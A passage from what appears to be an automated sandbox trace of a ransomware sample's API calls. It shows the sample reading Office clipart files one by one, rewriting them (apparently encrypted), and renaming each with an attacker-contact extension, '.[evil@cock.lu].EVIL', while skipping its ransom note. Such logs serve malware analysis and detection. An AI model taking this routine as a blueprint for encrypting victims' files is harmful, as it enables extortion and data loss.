hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0123.058] wcsstr (_Str="FD02075_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0123.058] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 69 [0123.058] wcscmp (_String1="FD02075_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0123.058] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD02075_.WMF") returned 0x0 [0123.058] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 0x45 [0123.058] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02075_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0123.060] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x112c, lpOverlapped=0x0) returned 1 [0123.070] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0123.070] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0123.070] _errno () returned 0x84b1160840 [0123.070] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.070] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x1140, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1140, lpOverlapped=0x0) returned 1 [0123.070] CloseHandle (hObject=0x1a8) returned 1 [0123.070] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0123.071] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0123.071] __uncaught_exception () returned 0x84b1160800 [0123.071] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0123.071] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02075_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02075_.wmf.[evil@cock.lu].evil")) returned 1 [0123.072] ??_V@YAXPEAX@Z () returned 0x1 [0123.075] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF", dwFileAttributes=0x200) returned 0 [0123.076] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0123.076] wcsstr (_Str="FD02088_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0123.076] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 69 [0123.076] wcscmp (_String1="FD02088_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0123.076] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD02088_.WMF") returned 0x0 [0123.076] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF") returned 0x45 [0123.076] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02088_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0123.078] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xe70, lpOverlapped=0x0) returned 1 [0123.088] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0123.088] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0123.088] _errno () returned 0x84b1160840 [0123.088] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.088] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xe80, lpOverlapped=0x0) returned 1 [0123.088] CloseHandle (hObject=0x1a8) returned 1 [0123.088] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0123.088] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0123.088] __uncaught_exception () returned 0x84b1160800 [0123.088] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0123.089] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02088_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02088_.wmf.[evil@cock.lu].evil")) returned 1 [0123.089] ??_V@YAXPEAX@Z () returned 0x1 [0123.094] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF", dwFileAttributes=0x200) returned 0 [0123.094] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0123.094] wcsstr (_Str="FD02097_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0123.094] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 69 [0123.094] wcscmp (_String1="FD02097_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0123.094] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD02097_.WMF") returned 0x0 [0123.094] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 0x45 [0123.094] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02097_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0123.097] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x61c, lpOverlapped=0x0) returned 1 [0123.156] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0123.156] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0123.156] _errno () returned 0x84b1160840 [0123.156] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.156] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x620, lpOverlapped=0x0) returned 1 [0123.157] CloseHandle (hObject=0x1a8) returned 1 [0123.157] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0123.157] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0123.157] __uncaught_exception () returned 0x84b1160800 [0123.157] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0123.157] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02097_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02097_.wmf.[evil@cock.lu].evil")) returned 1 [0123.158] ??_V@YAXPEAX@Z () returned 0x1 [0123.162] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF", dwFileAttributes=0x200) returned 0 [0123.162] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0123.162] wcsstr (_Str="FD02115_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0123.162] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 69 [0123.162] wcscmp (_String1="FD02115_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0123.162] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD02115_.WMF") returned 0x0 [0123.162] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 0x45 [0123.162] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02115_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0123.166] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1234, lpOverlapped=0x0) returned 1 [0123.193] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0123.193] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0123.193] _errno () returned 0x84b1160840 [0123.193] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.193] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x1240, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1240, lpOverlapped=0x0) returned 1 [0123.193] CloseHandle (hObject=0x1a8) returned 1 [0123.194] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0123.194] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0123.194] __uncaught_exception () returned 0x84b1160800 [0123.194] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0123.194] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02115_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02115_.wmf.[evil@cock.lu].evil")) returned 1 [0123.195] ??_V@YAXPEAX@Z () returned 0x1 [0123.197] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF", dwFileAttributes=0x200) returned 0 [0123.198] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0123.235] wcsstr (_Str="FD02116_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0123.235] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 69 [0123.235] wcscmp (_String1="FD02116_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0123.235] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD02116_.WMF") returned 0x0 [0123.235] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF") returned 0x45 [0123.235] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02116_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0123.237] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xf94, lpOverlapped=0x0) returned 1 [0123.266] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0123.266] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0123.266] _errno () returned 0x84b1160840 [0123.266] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.266] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0xfa0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xfa0, lpOverlapped=0x0) returned 1 [0123.266] CloseHandle (hObject=0x1a8) returned 1 [0123.267] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0123.267] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0123.267] __uncaught_exception () returned 0x84b1160800 [0123.267] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0123.267] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02116_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02116_.wmf.[evil@cock.lu].evil")) returned 1 [0123.268] ??_V@YAXPEAX@Z () returned 0x1 [0123.270] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF", dwFileAttributes=0x200) returned 0 [0123.271] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0123.271] wcsstr (_Str="FD02141_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0123.271] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 69 [0123.271] wcscmp (_String1="FD02141_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0123.271] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD02141_.WMF") returned 0x0 [0123.271] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF") returned 0x45 [0123.271] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02141_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0123.273] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa4c, lpOverlapped=0x0) returned 1 [0123.301] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0123.301] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0123.301] _errno () returned 0x84b1160840 [0123.301] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.301] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xa60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa60, lpOverlapped=0x0) returned 1 [0123.301] CloseHandle (hObject=0x1a8) returned 1 [0123.301] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0123.301] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0123.301] __uncaught_exception () returned 0x84b1160800 [0123.301] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0123.302] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02141_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02141_.wmf.[evil@cock.lu].evil")) returned 1 [0123.302] ??_V@YAXPEAX@Z () returned 0x1 [0123.305] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02141_.WMF", dwFileAttributes=0x200) returned 0 [0123.305] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0123.305] wcsstr (_Str="FD02153_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0123.305] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 69 [0123.305] wcscmp (_String1="FD02153_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0123.305] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD02153_.WMF") returned 0x0 [0123.305] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 0x45 [0123.305] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02153_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0123.307] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1510, lpOverlapped=0x0) returned 1 [0123.959] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0123.959] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0123.959] _errno () returned 0x84b1160840 [0123.959] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.959] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x1520, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1520, lpOverlapped=0x0) returned 1 [0123.959] CloseHandle (hObject=0x1a8) returned 1 [0123.960] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0123.960] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0123.960] __uncaught_exception () returned 0x84b1160800 [0123.960] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0123.960] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02153_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02153_.wmf.[evil@cock.lu].evil")) returned 1 [0123.961] ??_V@YAXPEAX@Z () returned 0x1 [0123.963] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF", dwFileAttributes=0x200) returned 0 [0123.964] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0123.964] wcsstr (_Str="FD02158_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0123.964] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 69 [0123.964] wcscmp (_String1="FD02158_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0123.964] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD02158_.WMF") returned 0x0 [0123.964] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02158_.WMF") returned 0x45 [0123.964] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02158_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02158_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0123.965] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x670, lpOverlapped=0x0) returned 1 [0124.038] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.038] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.038] _errno () returned 0x84b1160840 [0124.038] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.038] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x680, lpOverlapped=0x0) returned 1 [0124.039] CloseHandle (hObject=0x1a8) returned 1 [0124.039] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02158_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0124.039] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0124.039] __uncaught_exception () returned 0x84b1160800 [0124.039] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0124.039] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02158_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02158_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02158_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02158_.wmf.[evil@cock.lu].evil")) returned 1 [0124.040] ??_V@YAXPEAX@Z () returned 0x1 [0124.043] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02158_.WMF", dwFileAttributes=0x200) returned 0 [0124.043] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0124.043] wcsstr (_Str="FD02161_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0124.043] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 69 [0124.043] wcscmp (_String1="FD02161_.WMF", 